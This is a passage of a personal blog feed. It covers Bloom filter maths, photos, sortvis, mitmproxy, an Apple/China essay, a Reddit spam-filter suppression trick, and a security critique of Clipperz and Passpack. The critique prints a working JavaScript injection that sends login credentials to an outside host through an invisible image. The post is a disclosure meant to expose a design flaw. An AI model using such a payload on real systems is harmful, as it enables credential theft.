in the world - it's an immense privilege to be able to share a beach with them.</p>
3 Rules of thumb for Bloom Filters
2010-08-25T00:00:00+00:00
2010-08-25T00:00:00+00:00
https://corte.si/posts/code/bloom-filter-rules-of-thumb/
<p>I've spent a few days this week working on a side-project that relies heavily on
Bloom Filters (look for a post on the result of my labours in the next week or
so). If you don't know what a Bloom filter is, <a href="http://en.wikipedia.org/wiki/Bloom_filter">you should probably find
out</a> - they're very neat and have a
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.127.9672&rep=rep1&type=pdf">huge</a>
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.4.3831&rep=rep1&type=pdf">range</a>
of
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.126.2458&rep=rep1&type=pdf">fascinating</a>
<a href="http://www.cs.cmu.edu/%7Edga/papers/fastcache-tr.pdf">applications</a>.</p>
<p>I often need to do rough back-of-the-envelope reasoning about things, and I find
that doing a bit of work to develop an intuition for how a new technique
performs is usually worthwhile. So, here are three broad rules of thumb to
remember when discussing Bloom filters down the pub:</p>
<h3 id="1-one-byte-per-item-in-the-input-set-gives-about-a-2-false-positive-rate">1 - One byte per item in the input set gives about a 2% false positive rate.</h3>
<p>In other words, we can add 1024 elements to a 1KB Bloom Filter, and check for
set membership with about a 2% false positive rate. Nifty. Here are some common
false positive rates and the approximate required bits per element, assuming an
optimal choice of the number of hashes:</p>
<table>
<tr>
<th>fp rate</th> <th>bits</th>
</tr>
<tr>
<td>50%</td> <td>1.44</td>
</tr>
<tr>
<td>10%</td> <td>4.79</td>
</tr>
<tr>
<td>2%</td> <td>8.14</td>
</tr>
<tr>
<td>1%</td> <td>9.58</td>
</tr>
<tr>
<td>0.1%</td> <td>14.38</td>
</tr>
<tr>
<td>0.01%</td> <td>19.17</td>
</tr>
</table>
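<p>The figures in this table follow from the closed-form approximation derived in the maths section below: with an optimal number of hashes, the bits per element are <strong>b = -ln(p) / (ln 2)²</strong>. A quick sketch to reproduce them (illustrative, not production code):</p>

```python
import math

def bits_per_element(p: float) -> float:
    """Approximate bits per set element needed for a false positive
    rate p, assuming an optimal number of hash functions."""
    return -math.log(p) / (math.log(2) ** 2)

# Reproduce the table above.
for p in (0.5, 0.1, 0.02, 0.01, 0.001, 0.0001):
    print(f"{p:>8.2%}  {bits_per_element(p):.2f} bits")
```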
<p>Graphically, the relation between bits per element and the false positive rate
when using an optimal number of hashes looks like this:</p>
<div class="media">
<a href="graph.png">
<img src="graph.png" />
</a>
<div class="subtitle">
Bits per element vs. false positive probability
</div>
</div>
<h3 id="2-the-optimal-number-of-hash-functions-is-about-0-7-times-the-number-of-bits-per-item">2 - The optimal number of hash functions is about 0.7 times the number of bits per item.</h3>
<p>This means that the number of hashes is "small", varying from about 3 at a 10%
false positive rate, to about 13 at a 0.01% false positive rate.</p>
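<p>Using the relation <strong>k = b · ln 2</strong> (where <strong>b</strong> is bits per element, as derived in the maths section below), this is a couple of lines to verify; the function name here is my own:</p>

```python
import math

def optimal_hashes(bits_per_element: float) -> int:
    """Optimal hash count k = b * ln 2, rounded to a whole
    number of hash functions."""
    return round(bits_per_element * math.log(2))

print(optimal_hashes(4.79))   # 3 hashes at a 10% fp rate
print(optimal_hashes(19.17))  # 13 hashes at a 0.01% fp rate
```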
<h3 id="3-the-number-of-hashes-dominates-performance">3 - The number of hashes dominates performance.</h3>
<p>The number of hashes determines the number of bits that need to be read to test
for membership, the number of bits that need to be written to add an element,
and the amount of computation needed to calculate the hashes themselves. We may
sometimes choose a less-than-optimal number of hashes for performance reasons -
for instance, by rounding down when the calculated optimum is fractional.</p>
<h2 id="the-maths">The maths</h2>
<p>Let's do some maths to justify the above, starting with two well-known results
about Bloom filters that can be found in every description of the data
structure. First, by a combinatoric argument we can show that the probability
<strong>p</strong> of a false positive is approximated by the following formula, where <strong>k</strong>
is the number of hash functions, <strong>n</strong> is the size of the input set and <strong>m</strong>
is the size of the Bloom filter in bits:</p>
<div class="media">
<a href="formula-1.png">
<img src="formula-1.png" />
</a>
</div>
<p>Second, we know that <strong>k</strong> is optimal when:</p>
<div class="media">
<a href="formula-2.png">
<img src="formula-2.png" />
</a>
</div>
<p>Notice that in this formula, <strong>m/n</strong> is the number of bits per element in the
Bloom filter. So, the optimal number of hashes grows linearly with the number
of bits per element (<strong>b</strong>):</p>
<div class="media">
<a href="formula-6.png">
<img src="formula-6.png" />
</a>
</div>
<p>Assuming an optimal choice for <strong>k</strong> in the first formula, we get:</p>
<div class="media">
<a href="formula-3.png">
<img src="formula-3.png" />
</a>
</div>
<p>Solving for <strong>m</strong>:</p>
<div class="media">
<a href="formula-4.png">
<img src="formula-4.png" />
</a>
</div>
<p>It's clear from the above that for a given false-positive rate, the number of
bits in a Bloom filter grows linearly with <strong>n</strong>. If we set <strong>n = 1</strong>, we get
the following expression for the approximate number of bits needed per set
element:</p>
<div class="media">
<a href="formula-5.png">
<img src="formula-5.png" />
</a>
</div>
Love and war on Sandfly Beach
2010-08-16T00:00:00+00:00
2010-08-16T00:00:00+00:00
https://corte.si/posts/photos/sandflysealions/
<p>Hiked to the end of <a href="http://en.wikipedia.org/wiki/Sandfly_Bay">Sandfly Bay</a>
today. A strong North-Easter drove streams of fine beach-sand across the dunes,
making it feel like we were wading knee-deep in a swift river of sand. Surreal
and beautiful, but I was too afraid of getting grit into my camera to
photograph the scene.</p>
<p>At the end of the beach, we found two groups of <a href="http://en.wikipedia.org/wiki/New_Zealand_Sea_Lion">New Zealand Sea
Lions</a>. A female basking
with two large cubs, and two young males sparring while a massive mature bull
looked on.</p>
<p>Click to view in full size.</p>
<div class="media">
<a href="sealion_with_cubs_full.jpg">
<img src="sealion_with_cubs.jpg" />
</a>
<div class="subtitle">
Sea lion with cubs
</div>
</div>
<div class="media">
<a href="sparring_sealions_full.jpg">
<img src="sparring_sealions.jpg" />
</a>
<div class="subtitle">
Sparring sea lions
</div>
</div>
sortvis.org
2010-07-14T00:00:00+00:00
2010-07-14T00:00:00+00:00
https://corte.si/posts/visualisation/sortvisdotorg/
<p>I've just put up <a href="http://sortvis.org">sortvis.org</a>, the new official home of the
<a href="http://github.com/cortesi/sortvis">sortvis</a> sorting algorithm visualisation
project. The site has a complete set of up-to-date images, explanations of the
visualisation techniques, code snippets, and a rather snazzy Javascript image
viewer to let you pan and zoom through the huge images produced by the sortvis
<a href="http://sortvis.org/visualisations.html">dense</a> visualisation. Take a look, and
let me know what you think!</p>
Taiaroa Head
2010-05-18T00:00:00+00:00
2010-05-18T00:00:00+00:00
https://corte.si/posts/photos/taiaroa/
<div class="media">
<a href="taiaroa-full.jpg">
<img src="taiaroa.jpg" />
</a>
<div class="subtitle">
Taiaroa head
</div>
</div>
<p>Taken on a stormy day from Aramoana Mole.</p>
Apple, China and the war of ideas
2010-05-07T00:00:00+00:00
2010-05-07T00:00:00+00:00
https://corte.si/posts/politics/apple-is-china/
<p>There was a minor flap recently when <a href="http://www.androidguys.com/2010/04/27/andy-rubin-reacts-steve-jobs-likens-apple-north-korea/">Andy Rubin compared Apple to North
Korea</a>.
Many <a href="http://www.youtube.com/watch?v=lQKdEdzHnfU">turtle-necked Apple hipsters</a>
had their feathers mildly ruffled, and bloggers gleefully reaped a tiny flurry
of page impressions. Quite right too, because Rubin was clearly wrong. Apple is
nothing like North Korea, because <strong>Apple is the China of the tech world</strong>. Lend
me your ears for a minute, while I make a broad-strokes argument for this
statement.</p>
<div class="media">
<a href="mao.jpg">
<img src="mao.jpg" />
</a>
</div>
<p>Not so long ago, the consensus in the West was that political liberty and
capitalism went hand-in-hand. Wherever one arose, the other would inevitably
follow, and in their wake would come prosperity. When China started liberalising
its markets, it seemed self-evident that the rise of capitalism in China would
bring democracy in its wake. The Tiananmen Square protests in 1989 were supposed
to be a sign of things to come, a precursor to wider revolution. The West's
argument was persuasive - it was borne out by a century during which the world
was a roiling cauldron of political and economic experimentation, and nearly
every command economy had failed. Today, the international landscape has changed
entirely. The West has had a catastrophic financial meltdown, and things are
only getting worse. There is a sense that the US-led Western order is in
decline, and the Chinese-led east is rising. China has been the fastest growing
major economy in the world for a decade, and the Communist Party is more firmly
in control than ever. Today, there's no apparent prospect of political reform.
Chinese intellectuals and diplomats are beginning to mount an increasingly
assertive and persuasive argument for a system of government that brings
prosperity without liberty, and dictatorships the world over are listening very,
very carefully.</p>
<p>In the software world, we've also spent decades arguing that freedom and
prosperity go hand in hand. This is the <a href="http://en.wikipedia.org/wiki/Open_source_software#Open_source_software_vs._free_software">"Open
Source"</a>
justification for free software: a pragmatic position that we should have
liberty not for its own sake, but because it produces better outcomes. This is
also the argument behind open hardware platforms, behind open Internet
standards, behind interoperability. Some bloody battles had to be fought with
monopolists, but in the main the last 20 years have been a stunning success for
openness. There has always been a
<a href="http://en.wikipedia.org/wiki/Richard_Stallman">minority</a> who have made a more
fundamental case for liberty, but it's important to recognise that they have
lost the debate. The engine that drives the most important Open Source projects
is entirely based on a superficial utilitarianism - the Googles and IBMs of the
world don't contribute to Open Source because they love liberty, but because the
financial return they get from doing so is greater than their investment. The
fundamental distinction between openness and free-ness hasn't been important so
far, though, because ideology and utilitarian arguments were aligned. Now,
things are changing. No-one can deny that Apple's mobile device strategy has
been a complete slam-dunk. The iPhone is the <a href="http://tech.fortune.cnn.com/2010/03/02/what-doth-it-profit-an-iphone/">most profitable handset out
there</a> by
far, and the iPad is shaping up to be huge. Apple's long-term plan is
breathtakingly ambitious - it's making a play for complete dominance in the
mobile market, with an integrated offering that controls everything from content
to applications to the devices themselves. It's therefore making a play for
total control of the way most people will experience computation in the near
future. Not even the most die-hard free-software hippie can deny that Apple's
success has been won on merit - their devices are simply, unmistakably better
than the competition. Open platforms have been out-classed in almost every
measurable dimension. So, we may be entering the next stage of the computer
revolution with devices where every native application has to be approved by a
single authority, where even programming languages and development tools are
centrally controlled. Apple's competitors and imitators are watching and taking
notes, because far from being punished by the market for this, they have
profited beyond the wildest dreams of avarice.</p>
<p>Apple and China have put pragmatists who also value freedom in a quandary. In
the past, practice and ideology aligned neatly: political liberty and economic
progress went hand in hand, and so did open platforms and commercial success.
There are now powerful counter-examples to this line of thinking, and it seems
clear that making a pragmatic argument for liberty has been a strategic
mis-step both in politics and in technology. Advocates of freedom will have to
turn back to more fundamental arguments: human rights, ethics and morality. We
should recognize that at this point in time, we're losing the war of ideas. I
must admit, in my darker moments I'm pessimistic about our ability to make the
case persuasively to a disengaged public.</p>
<p><strong>PS</strong></p>
<p>To keep this post manageable, I've not talked about factors that muddy the
waters for the technical side of the argument. For instance, I don't think
Microsoft is a counter-example, and neither is Apple's support for open web
standards. I'll save those for a future post. I'd also like to point out that
I'm absolutely not anti-Apple - I own a lot of Apple gear that I use every day.
My position regarding China's place in the world is a caricature of <a href="http://en.wikipedia.org/wiki/Stefan_Halper">Stefan
Halper</a>'s superb book <a href="http://www.amazon.com/Beijing-Consensus-Authoritarian-Dominate-Twenty-First/dp/0465013619/">"The Beijing
Consensus: How China's authoritarian model will dominate the twenty-first
century"</a>.
You can listen to him speaking about this book at the Cato Institute <a href="http://www.cato.org/event.php?eventid=6990">over
here</a>.</p>
Sortvis updates
2010-04-01T00:00:00+00:00
2010-04-01T00:00:00+00:00
https://corte.si/posts/visualisation/sortvis-update/
<div class="media">
<a href="oddevensort.png">
<img src="oddevensort.png" />
</a>
</div>
<p>There have been some improvements to <a href="http://sortvis.org">sortvis</a> - my
sorting algorithm visualisation project - in the last few months. Graphs are now
more balanced, with an equal lead-in and lead-off at the edges. There has also
been a swathe of algorithm contributions - thanks to Aaron Gallagher and Chris
Wong (the image above is of <a href="http://en.wikipedia.org/wiki/Odd-even_sort">Odd-even
Sort</a>, contributed by Aaron). As
usual, you can find the code for all of this on
<a href="http://github.com/cortesi/sortvis">github</a>. I've updated the visualisation page
on my blog with new graphs for all algorithms - go take a look
<a href="http://sortvis.org">here</a>.</p>
<p>I plan to move sortvis and the collection of visualisations onto their own
domain soon. I'm also thinking about making large wall-posters of the
visualisations available. I plan to make some prints for myself, and I'm
assuming that I'm not the only one geeky enough to want a sorting algorithm on
my wall. Would anyone be interested?</p>
mitmproxy 0.2
2010-03-01T00:00:00+00:00
2010-03-01T00:00:00+00:00
https://corte.si/posts/software/mitmproxy0_2/
<p>Just released <a href="http://mitmproxy.org">mitmproxy 0.2</a>. Changes include:</p>
<ul>
<li>Big speed and responsiveness improvements, thanks to Thomas Roth</li>
<li>Support urwid 0.9.9</li>
<li>Terminal beeping based on filter expressions</li>
<li>Filter expressions for terminal beeps, limits, interceptions and sticky
cookies can now be passed on the command line.</li>
<li>Save requests and responses to file</li>
<li>Split off non-interactive dump functionality into a new tool called
mitmdump</li>
<li>"A" will now accept all intercepted connections</li>
<li>Lots of bugfixes</li>
</ul>
How to stop a story from appearing on Reddit
2010-02-28T00:00:00+00:00
2010-02-28T00:00:00+00:00
https://corte.si/posts/socialmedia/reddit-story-dos/
<div class="media">
<a href="reddit-story-dos.jpg">
<img src="reddit-story-dos.jpg" />
</a>
</div>
<p>Mallory hates Bob. Bob has a blog about ponies, and Mallory knows that a
large-ish fraction of Bob's traffic comes from the <a href="http://www.reddit.com/r/ponies">ponies
Subreddit</a>. If Bob's stories stopped appearing
there it would make him sad, and Mallory, the venomous little sadist that he
is, would rejoice. Here's how Mallory could accomplish the deed:</p>
<ul>
<li>Watch Bob's blog closely to make sure he's the first to submit Bob's
posts to Reddit.</li>
<li>Include some words that will trigger the spam-filter in the submission
title. Any combination of "viagra" and "cialis" will do just fine.</li>
<li>Sit back and cackle evilly.</li>
</ul>
<p>Now Bob's post is sitting in the spam queue on the ponies Subreddit. Since the
post has already been submitted, the nice users who usually submit Bob's story
can't re-submit it to the same Subreddit. Maybe someone will notice and alert a
moderator, but by the time they un-ban the story nobody cares because it's
already 10 hours old and on page 50 of the /new queue. Bob thinks nobody loves
him, and retires to live out the remainder of his years, sad and lonely, in a
small, unheated hut on a hill outside of town.</p>
<p>In this story, I am Bob, Mallory is some innocent schmuck who submitted my
<a href="https://corte.si/posts/security/hostproof/">last post</a> to the programming Subreddit
while they were silently banned (how were they to know, right?), and the small,
unheated hut is the Aeron chair in front of my desk. The blog about ponies,
however, is entirely fictional.</p>
Host-proof applications: doing it wrong
2010-02-26T00:00:00+00:00
2010-02-26T00:00:00+00:00
https://corte.si/posts/security/hostproof/
<p><b>Please note that the criticism of Clipperz in this post is now out of date -
the Clipperz team is clearly very security-focused, and responded quickly to
address the concerns raised below. </b></p>
<p>Every day I push another bit of my life into the cloud. There was a time when
all my personal data lived on one or two drives I could actually see, touch, and
sniff. Now, I don't even run a personal backup anymore - my software is on
Github, my emails are with Google and the rest of my personal data is spread
evenly between Facebook, Twitter and a handful of online productivity tools. I
do keep redundant checkouts of the important stuff, but that's really just a
side-effect of needing to be able to work off-line. The truth is, my house and
all my gear could sink into the swamp tomorrow, and as long as I have a web
browser and git I'd be back to work the same day. How wonderful...</p>
<p>... but, then again. I think like a devious, malicious cad <a href="http://www.nullcube.com">for a
living</a>, and where one part of me sees convenience,
another sees spooks, privacy violations and unscrupulous monetisation
opportunities. I can't help but feel we got shafted. We were promised a glorious
decentralised future where everyone would be in control of their own data, and
instead our lives have been sliced up and warehoused in a small handful of
all-powerful, opaque silos. The companies running these things all say the same
thing - "Trust us!" - but as data leak follows data leak and privacy violation
follows privacy violation, there has to come a time when users decide that
promises aren't good enough.</p>
<h2 id="host-proof-applications">Host-proof applications</h2>
<p>It turns out that the first tentative steps towards a better way of doing things
have already been taken. The broad goal is simple: to design web applications in
such a way that we don't <em>have</em> to trust the host. Javascript interpreters are
fast enough nowadays to do real-world crypto at reasonable speeds, so we can
encrypt and decrypt data on the client side and store only encrypted data on the
server. The server never sees our encryption keys, and if the implementation is
secure, couldn't access our data even if it tried.</p>
<p>Two groups of people have pioneered this application development style, under
two different names. As far as I can tell, the idea was first articulated in
2005 by <a href="http://smokey.rhs.com/web/blog/PowerOfTheSchwartz.nsf/d6plinks/RSCZ-6C5G54">Richard
Schwartz</a>,
and fleshed out on the ajaxpatterns.org wiki under the name <a href="http://ajaxpatterns.org/Host-Proof_Hosting">host-proof
hosting</a>. Shortly after that,
<a href="http://clipperz.com">Clipperz</a> floated as the first real-world, commercial
implementation of essentially the same idea, but its founders described what
they were building as a <a href="http://www.clipperz.com/users/marco/blog/2007/08/24/anatomy_zero_knowledge_web_application">zero knowledge web
application.</a>
Reading these manifestos carefully, it seems clear that although their emphases
are different, their core aims and principles are identical. It's also pretty
clear that both terms are misnomers. "Zero-knowledge" has a specific
<a href="http://en.wikipedia.org/wiki/Zero-knowledge_proof">cryptographic meaning</a>
that's only peripherally relevant to the broad application design pattern.
What's more, the term is misleading to the layperson, since there's no such
thing as a "zero-knowledge" application, in any real sense. The server
unavoidably knows quite a lot about the client - the address they're connecting
from, how frequently they connect, what operations they're executing, what
browser they're using, and so on. "Host-proof hosting", on the other hand,
assigns the "host-proof" attribute to the wrong end of the pipe. A more accurate
term would be <strong>host-proof application</strong>, and that's how I'm going to refer to
these ideas in the rest of this post.</p>
<p>The pot of gold at the end of this rainbow is to combine the benefits of the
cloud with strong, host-independent data security guarantees. The possibilities
are incredibly enticing. I can imagine a cryptographic Facebook where you don't
need to trust the host to aggregate the entire world's private data in the
clear. I can imagine storing medical records and financial data in the cloud
while still allowing people to maintain direct control over who uses the data
and how. I can imagine a Gmail where everyone uses crypto by default, where
decryption and encryption happens right in the browser. Yes, the technical
obstacles that stand in the way of these dreams are immense, but if we can
surmount them a better world lies beyond.</p>
<h2 id="two-steps-to-shangri-la">Two steps to Shangri-la</h2>
<p>Before we look at some real-world applications, I'd like to briefly talk about
two essential elements of a secure host-proof application: client-side security
and verification. Let's take each of these in turn.</p>
<h3 id="1-client-side-security">1: Client-side security</h3>
<p>Host-proof applications turn the traditional web security model on its head.
Instead of trying to secure the server from the browser, we have to secure the
browser-side application from the server. In fact, we fundamentally <em>don't
care</em> about the server side of the equation - the client-side code should be
secure no matter what combination of malicious skulduggery happens upstream.
Yes, this does mean that a host-proof app's security hinges on the security of
the browser scripting environment, which is undoubtedly one of the most
security-hostile spaces ever devised by the mind of man. Many sensible people
would call it quits right there, but I think we can do a decent job of client
side security with careful thought.</p>
<h3 id="2-verification">2: Verification</h3>
<p>Once we have a secure client-side application, we need to make the tools and
information available to allow users to actually verify that the code running
in their browser is secure. This immediately implies that the client-side of
the application has to be published somewhere independent for peer review.
Perhaps surprisingly, we can also conclude that publishing the server code of a
host-proof application is a distraction. Spending time verifying the security
of the server code is a waste of effort, since we must always assume that the
server has already been compromised, and is actively malicious.</p>
<p>The next step in the verification process is harder. Every time the user visits
a host-proof application, they are getting a blob of potentially malicious data
from the server. It's vital that there be some mechanism that allows the user
to check that the code running in their browser matches the code published for
peer review. One obvious but cumbersome way to do that is to make sure that
your entire application is a single, rolled-up blob, and then to simply publish
a checksum. Although it's a pain in the ass to do, in theory users can
download and verify the application's integrity. In reality, the vast majority
of users won't ever bother to use a verification system this cumbersome, and even
those that do won't do so every time. That's not a good reason to give up,
though - making this process workable for users is critical if the host-proof
paradigm is to be viable.</p>
<h2 id="how-to-penetration-test-a-host-proof-application">How to penetration test a host-proof application</h2>
<p>Two characteristic "game-over" scenarios follow immediately from these security
elements. First, we could subvert the verification process to fool the user
into using a corrupted application. Second, we could exploit a security hole in
the client-side application to execute arbitrary code in the browser. If we can
do either of these things, a malicious entity in control of the server could
access a user's private data and have their merry way with it. Which would be
bad. In both these scenarios the server is the attacker - so, where a
traditional web app penetration test often revolves around malicious data sent
by the browser to the server, a host-proof app penetration test focuses on
malicious responses from the server to the browser. Of course, there are a
myriad of other ways in which the security of a host-proof app can fail - but
verification and client-side security are the first two hurdles to cross.</p>
<p>At this point, you might be thinking that a tool that lets you tamper with
server responses before they hit the browser would be damn handy. Tools like
<a href="https://addons.mozilla.org/en-US/firefox/addon/966">TamperData</a> let you modify
outbound requests, but it turns out that extending them to do the same with
inbound data is non-trivial. Not entirely coincidentally, though, I recently
released a little tool called <a href="http://mitmproxy.org">mitmproxy</a> that does
the job just fine. It's an interactive, SSL-capable proxy with a curses
interface that sits between your browser and the server, letting you intercept
and modify requests and responses on the fly.</p>
<p>Let's take mitmproxy for a spin to look at some of the contenders in the
host-proof application space.</p>
<h2 id="clipperz-facepalm">Clipperz: facepalm</h2>
<p>First in line is <a href="http://www.clipperz.com">Clipperz</a>, a project I've been
following for a number of years. The founders - Marco Barulli and Giulio
Cesare Solaroli - were early pioneers of the host-proof application paradigm,
and as far as I know, were the first to try to make a livelihood by
commercialising the idea. To get a flavour for what they're about, I highly
recommend <a href="http://itc.conversationsnetwork.org/shows/detail4283.html">this
interview</a> that Jon
Udell did with Barulli.</p>
<p>Now, let's review the claims that Clipperz makes for itself. Its
<a href="http://www.clipperz.com/about">about</a> page says:</p>
<blockquote>
<p>We got used to trust online services with our data (photos, text documents,
spreadsheets, ...) but Clipperz proves that this is not necessary: users can
enjoy a web based application without the need to trust the web application
provider.</p>
</blockquote>
<p>The <a href="http://www.clipperz.com/support/user_guide">user guide</a> expands on this:</p>
<blockquote>
<p>Clipperz simply hosts your encrypted cards and provide you with a nice
interface to manage your data, but it could never access the cards in their
plain form.</p>
</blockquote>
<p>Well, righty oh! That's a very forthright guarantee. Let's see if Clipperz lives
up to it.</p>
<h3 id="1-verification">1: Verification</h3>
<p>Clipperz takes verification seriously. The entire Clipperz source is
prominently published for review. They also seem to have architected their
application specifically to make checksum verification possible - the
client-side comes down the wire as a single blob, with no external
dependencies. This means that verification really can be as simple as taking a
checksum over the application page. They even have <a href="http://www.clipperz.com/reviewing_the_code/checksums">instructions that show how
to do this using wget</a>.</p>
<p>There are two important criticisms of the Clipperz verification process. Most
critically, they publish the checksums and verification package right on the
Clipperz homepage. If we assume that the server has been compromised, the
attacker is in control of both the checksums and the app, and we're up the
creek. Secondly, although Clipperz has gone to a lot of effort to make the
process easy, verification is still too cumbersome. The vast majority of their
users will never bother to verify their client-side at all. Some more
innovation is needed from an already very innovative company to make this
process simpler.</p>
<p>All told, though, this is a good effort - with a little bit of extra work,
Clipperz would get a definite "pass" for verification.</p>
<h3 id="2-client-side-security">2: Client-side security</h3>
<p>Client-side security is a different story. The moment we look at the traffic
between the client and server, it's immediately clear that something is very,
very wrong. Here's a sample of what comes down the pipe to the client:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">throw </span><span style="color:#c0c5ce;">'</span><span style="color:#a3be8c;">allowScriptTagRemoting is false.</span><span style="color:#c0c5ce;">';
</span><span style="color:#65737e;">//#DWR-INSERT
//#DWR-REPLY
</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">s0</span><span style="color:#c0c5ce;">={};</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">={};</span><span style="color:#bf616a;">s0</span><span style="color:#c0c5ce;">.result="</span><span style="color:#a3be8c;">done</span><span style="color:#c0c5ce;">";</span><span style="color:#bf616a;">s0</span><span style="color:#c0c5ce;">.lock="</span><span style="color:#a3be8c;">4EB1C567-7FFE-928D-E0C8-11AF8870DE57</span><span style="color:#c0c5ce;">";
</span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">.requestType="</span><span style="color:#a3be8c;">MESSAGE</span><span style="color:#c0c5ce;">";</span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">.targetValue="</span><span style="color:#a3be8c;">blahblah</span><span style="color:#c0c5ce;">";</span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">.cost=</span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">;
</span><span style="color:#bf616a;">dwr</span><span style="color:#c0c5ce;">.engine.</span><span style="color:#bf616a;">_remoteHandleCallback</span><span style="color:#c0c5ce;">('</span><span style="color:#a3be8c;">5</span><span style="color:#c0c5ce;">','</span><span style="color:#a3be8c;">0</span><span style="color:#c0c5ce;">',{result:</span><span style="color:#bf616a;">s0</span><span style="color:#c0c5ce;">,toll:</span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">});
</span></code></pre>
<p>Don't let the <strong>throw</strong> at the top of the snippet fool you. That gets stripped
off by the client-side code, and the remainder of the snippet is then run by
the client-side application. Yes, folks: Clipperz uses
<a href="http://directwebremoting.org/dwr/index.html">DWR</a>, which means that the
Clipperz server sends little chunks of Javascript back to the browser, which
are then eval-ed in the password manager's context. This means that the
application is <em>designed</em> to let the supposedly untrusted server execute
arbitrary code in the secure environment that contains your S00P3R S3KR3T data.
So all their work to make their application verifiable and all the effort
expended to publish their code for review is worth exactly bupkis.</p>
<p>Facepalm.</p>
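<p>To see why this is fatal, here's a hypothetical reconstruction of what a
DWR-style client does with a response like the one above - my own illustrative
sketch, not Clipperz's actual code:</p>

```javascript
// Strip the anti-hijacking "throw" prelude, then execute whatever is left.
function handleDwrResponse(body) {
  const script = body.replace(/^throw [^\n]*\n/, '');
  // eval runs the server's response verbatim in the application's context,
  // so a malicious server gets arbitrary code execution - checksum or not.
  return eval(script);
}

handleDwrResponse("throw 'allowScriptTagRemoting is false.';\nvar s0={}; s0.result='done'; s0");
// the server-supplied script runs, and its final value is returned
```

<p>Any transport with this shape defeats verification: the reviewed, checksummed
blob may itself be secure, but it obediently executes unreviewed code on every
request.</p>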
<p>To prove that this isn't an academic issue, here's a trivial exploit showing
how someone in control of the Clipperz server could access a user's private
data even if they went to the effort of verifying the application checksum.
<strong>WARNING:</strong> Doing this using your real Clipperz credentials will make your
username and password appear in my webserver logs! If you're following along
with mitmproxy, you need to set an intercept on responses from Clipperz ("i"
for intercept, and use the pattern "~s ~u clipperz"). And then add the
following lines of code to the first server response after you click the
"login" button, just below the "#DWR-REPLY" marker:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">var </span><span style="color:#bf616a;">f </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">getElementsByTagAndClassName</span><span style="color:#c0c5ce;">("</span><span style="color:#a3be8c;">input</span><span style="color:#c0c5ce;">", "</span><span style="color:#a3be8c;">loginFormField</span><span style="color:#c0c5ce;">");
</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">= "</span><span style="color:#a3be8c;">http://corte.si/sploit/</span><span style="color:#c0c5ce;">";
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">(</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">i</span><span style="color:#c0c5ce;">=</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">; </span><span style="color:#bf616a;">i </span><span style="color:#c0c5ce;">< </span><span style="color:#bf616a;">f</span><span style="color:#c0c5ce;">.length; </span><span style="color:#bf616a;">i</span><span style="color:#c0c5ce;">++){</span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">+ </span><span style="color:#bf616a;">f</span><span style="color:#c0c5ce;">[</span><span style="color:#bf616a;">i</span><span style="color:#c0c5ce;">].value + "</span><span style="color:#a3be8c;">::</span><span style="color:#c0c5ce;">";}
</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">e </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">IMG</span><span style="color:#c0c5ce;">({"</span><span style="color:#a3be8c;">src</span><span style="color:#c0c5ce;">": </span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">, "</span><span style="color:#a3be8c;">height</span><span style="color:#c0c5ce;">": "</span><span style="color:#a3be8c;">0px</span><span style="color:#c0c5ce;">", "</span><span style="color:#a3be8c;">width</span><span style="color:#c0c5ce;">": "</span><span style="color:#a3be8c;">0px</span><span style="color:#c0c5ce;">"});
</span><span style="color:#bf616a;">appendChildNodes</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">$</span><span style="color:#c0c5ce;">("</span><span style="color:#a3be8c;">header</span><span style="color:#c0c5ce;">"), </span><span style="color:#bf616a;">e</span><span style="color:#c0c5ce;">);
</span></code></pre>
<p>This rough and ready snippet simply adds an invisible image tag to the page,
which loads a bogus image that includes the username and password in the source
path. Image sources aren't constrained by the same origin policy, so we can
send this data wherever we like - in this case, the server my blog is hosted
on. The login process will continue as usual, and unless the user is watching
their network traffic carefully, they'll be none the wiser.</p>
<h2 id="don-t-worry-clipperz-passpack-does-it-wrong-too">Don't worry Clipperz, Passpack does it wrong too</h2>
<p>The other big contender in the host-proof application space is Clipperz'
slicker-looking rival, <a href="http://www.passpack.com">Passpack</a>. A glance at their
security page shows that they definitely refer to themselves as applying the
"host-proof hosting" pattern. Their <a href="https://www.passpack.com/en/faq/">FAQ</a>
makes the typical strong security claim:</p>
<blockquote>
<p><strong>Can Passpack read my passwords?</strong></p>
<p>Not even if we wanted to. It's not possible.</p>
</blockquote>
<p>Not possible, eh? Well, let's see.</p>
<h3 id="1-verification-1">1: Verification</h3>
<p>Passpack has completely punted on the verification issue. They don't publish
any checksums, they don't publish their source, and their application is split
up into innumerable components that would make verification a nightmare. In a
blog post <a href="http://blog.passpack.com/2007/04/passpack-and-clipperz-the-difference">comparing themselves with
Clipperz</a>,
they make clear that this is a conscious choice on their part, not an
oversight. In fact, they level the same criticism at the Clipperz verification
process that I do. Clipperz publishes their verification package right on their
homepage:</p>
<blockquote>
<p>However, if I am in a phished version of Clipperz, it's a moot point because
the phisherman can falsify those values as well so that they match his
spoofed version.</p>
</blockquote>
<p>This misses the point of the checksum somewhat - we're not trying to protect
against phishing, but against a malicious server - but the criticism is valid
none the less. Passpack is also right that the Clipperz checksum verification
process is too cumbersome:</p>
<blockquote>
<p>I just don't think anyone would really do that - always, every single time,
many times a day.</p>
</blockquote>
<p>Quite so. But instead of trying to compete with Clipperz by doing a better job on
